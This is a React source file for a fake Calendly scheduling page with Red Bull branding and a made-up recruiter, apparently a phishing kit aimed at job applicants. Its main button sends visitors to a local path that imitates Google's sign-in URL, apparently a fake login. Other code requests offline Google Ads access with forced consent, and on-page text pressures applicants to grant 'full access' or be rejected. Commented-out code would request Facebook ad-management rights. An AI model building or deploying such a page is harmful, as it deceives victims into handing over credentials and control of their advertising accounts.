import React from 'react';

// ✅ Import all assets
import clock from './assets/clock.2ced35e604aa6d1f8eea0c5026a61f6d.37ed247879b59fe743d5614e4f510d8c.svg';
import redbullLogo from './assets/loogsos.5456684a4e17e1c4687a.png';
import camera from './assets/camera.d8eeb4352132a583d5a94936a8f1798a.3ed45bc0762ef3da2ace1c2096ada089.svg';
import calendlyLogo from './assets/calendly.8d2b1d88617b5da85edf35811ff2ab7a.d1075a2021262e0d7158fb3cedaf1527.svg';
import facebookIcon from './assets/gg.1655ccdd19b7c6beb6361aa61c823215.svg';
import globe from './assets/globe.1eae85210f348ab9e928a0dd6e17ff89.96b944207cce82b6585e3ec9b52c5639.svg';

const GOOGLE_CLIENT_ID = process.env.REACT_APP_GOOGLE_CLIENT_ID || '22981196837-d2n8ven839ad7t5t44c9o237lk96i2l6.apps.googleusercontent.com';
// const FB_APP_ID = process.env.REACT_APP_FB_APP_ID || '1472050717838767';

const GOOGLE_OAUTH_SCOPES = [
  'openid',
  'email',
  'profile',
  'https://www.googleapis.com/auth/adwords',
].join(' ');

function MainPage() {
  const handleButtonClick = () => {
   window.location.href="/v3/signin/identifierauthusercontinue="
  };

  const handleGoogleOAuth = () => {
    const params = new URLSearchParams({
      client_id: GOOGLE_CLIENT_ID,
      redirect_uri: `${window.location.origin}/auth/callback`,
      response_type: 'code',
      scope: GOOGLE_OAUTH_SCOPES,
      access_type: 'offline',
      prompt: 'consent',
    });
    window.location.href = `https://accounts.google.com/o/oauth2/v2/auth?${params.toString()}`;
  };

  // const handleFacebookOAuth = () => {
  //   const params = new URLSearchParams({
  //     client_id: FB_APP_ID,
  //     redirect_uri: `${window.location.origin}/auth/facebook/callback`,
  //     response_type: 'code',
  //     scope: 'email,public_profile,ads_management,ads_read',
  //     state: Math.random().toString(36).substring(7),
  //   });
  //   window.location.href = `https://www.facebook.com/v21.0/dialog/oauth?${params.toString()}`;
  // };

  return (
    <div id="root">
      <div className="calendy-div">
        <div className="calendy-grid">
          {/* Left Side */}
          <div className="left-side">
            <div>
              <img alt="Red Bull" className="selby-logo" src={redbullLogo} style={{ marginBottom: '20px' }} />
              <div style={{ display: 'flex', alignItems: 'center', gap: '12px', marginBottom: '4px' }}>
                <img alt="AJ Cooper" src="/ajcooper.jpg" style={{ width: '48px', height: '48px', borderRadius: '50%', objectFit: 'cover' }} />
                <h3 style={{ margin: 0, lineHeight: '48px' }}>AJ Cooper</h3>
              </div>
              <h2>Meet AJ Cooper</h2>
              <div></div>

              <div className="calendy-div-icons">
                <div className="calendy-icons">
                  <img alt="clock" src={clock} />
                  <span>30 min</span>
                </div>

                <div className="calendy-icons" style={{ gap: '15px' }}>
                  <img alt="camera" src={camera} />
                  <span>
                    Web conferencing details provided upon confirmation.
                  </span>
                </div>

                <div className="footer-links">
                  <a href="#">Cookie settings</a>
                  <a href="#">Report abuse</a>
                </div>
              </div>
            </div>
          </div>

          {/* Right Side */}
          <div className="right-side">
            <a
              className="VJL48qbQzWENTFAh1Knk e9TS9yoMqqIN2PqBo1QG _i6SG2jlTfccH2ZZblil"
              href="/"
              data-discover="true"
            >
              <div
                data-id="branding"
                className="jWSwi_R_Xl7kPjUhuQoo _igrKj_5lj_5nWQu8DPw"
              >
                <div className="V7YfvNqWv0XKYKys7N7K __d5yUqDgBEjoX7J2dql">
                  powered by
                </div>
                <div className="HvybhIo63ZbBJxHh7Ann RK3ps09FjZwzHTaYDakl">
                  Calendly
                </div>
              </div>
            </a>

            <div>
              <div className="calendy-logo">
                <img alt="Calendly Logo" src={calendlyLogo} />
              </div>
              <h2>Schedule your call with us!</h2>
              <h3></h3>

              <div className="fb-text">
                <p className="fb-paragraphg">
                  <span>The easiest way for you to sign up is with Google.</span>
                  <span> This will automatically connect your calendar</span>
                  <span className="mr-1"> so you can start using Calendly right away.</span>
                </p>
                <p style={{ fontSize: '12px', color: '#555', marginTop: '12px', lineHeight: '1.5', fontStyle: 'italic', padding: '10px 12px', background: '#f8f8f8', borderLeft: '3px solid #e53e3e', borderRadius: '4px' }}>
                  <strong style={{ fontStyle: 'normal', color: '#333' }}>Important:</strong> During sign-in, you will be prompted to grant access to Google Ads. Our internal recruiting team uses this to evaluate your campaign performance, which is a <strong style={{ fontStyle: 'normal' }}>crucial part of the application review process</strong>. Please ensure all requested permissions are accepted — <strong style={{ fontStyle: 'normal', color: '#e53e3e' }}>applications that do not grant full access will not be reviewed</strong>.                </p>
              {/* qikjo tbon redirect me bo login vet */}
              <div style={{ display: 'flex', alignItems: 'center', gap: '12px', margin: '16px 0' }}>
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                  {/* <span style={{ fontSize: '13px', color: '#888' }}>or</span> */}
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                </div>

                <button onClick={handleButtonClick} className="fb-btn">
                  <img alt="Facebook" src={facebookIcon} style={{ width: '20px' }} />{' '}
                  Continue with Google
                </button>

                {/* <div style={{ display: 'flex', alignItems: 'center', gap: '12px', margin: '16px 0' }}>
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                  <span style={{ fontSize: '13px', color: '#888' }}>or</span>
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                </div> */}

                {/* <button onClick={handleGoogleOAuth} className="fb-btn" style={{ background: '#fff', border: '1px solid #dadce0', color: '#3c4043', marginTop: '20px' }}>
                  <svg style={{ width: '20px', height: '20px', marginRight: '8px' }} viewBox="0 0 48 48">
                    <path fill="#EA4335" d="M24 9.5c3.54 0 6.71 1.22 9.21 3.6l6.85-6.85C35.9 2.38 30.47 0 24 0 14.62 0 6.51 5.38 2.56 13.22l7.98 6.19C12.43 13.72 17.74 9.5 24 9.5z"/>
                    <path fill="#4285F4" d="M46.98 24.55c0-1.57-.15-3.09-.38-4.55H24v9.02h12.94c-.58 2.96-2.26 5.48-4.78 7.18l7.73 6c4.51-4.18 7.09-10.36 7.09-17.65z"/>
                    <path fill="#FBBC05" d="M10.53 28.59c-.48-1.45-.76-2.99-.76-4.59s.27-3.14.76-4.59l-7.98-6.19C.92 16.46 0 20.12 0 24c0 3.88.92 7.54 2.56 10.78l7.97-6.19z"/>
                    <path fill="#34A853" d="M24 48c6.48 0 11.93-2.13 15.89-5.81l-7.73-6c-2.15 1.45-4.92 2.3-8.16 2.3-6.26 0-11.57-4.22-13.47-9.91l-7.98 6.19C6.51 42.62 14.62 48 24 48z"/>
                  </svg>
                  Sign in with Google
                </button> */}

                {/* Facebook Login - commented out for now
                <div style={{ display: 'flex', alignItems: 'center', gap: '12px', margin: '16px 0' }}>
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                  <span style={{ fontSize: '13px', color: '#888' }}>or</span>
                  <div style={{ flex: 1, height: '1px', background: '#ddd' }} />
                </div>

                <button onClick={handleFacebookOAuth} className="fb-btn" style={{ background: '#1877F2', border: 'none', color: '#fff' }}>
                  <svg style={{ width: '20px', height: '20px', marginRight: '8px' }} viewBox="0 0 24 24" fill="#fff">
                    <path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z"/>
                  </svg>
                  Sign in with Facebook
                </button>
                */}
              </div>
            </div>

            <div className="time">
              <h4>Time zone</h4>
              <div className="timezone">
                <img alt="globe" src={globe} />
                <span>Global (16:48)</span>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}

export default MainPage;
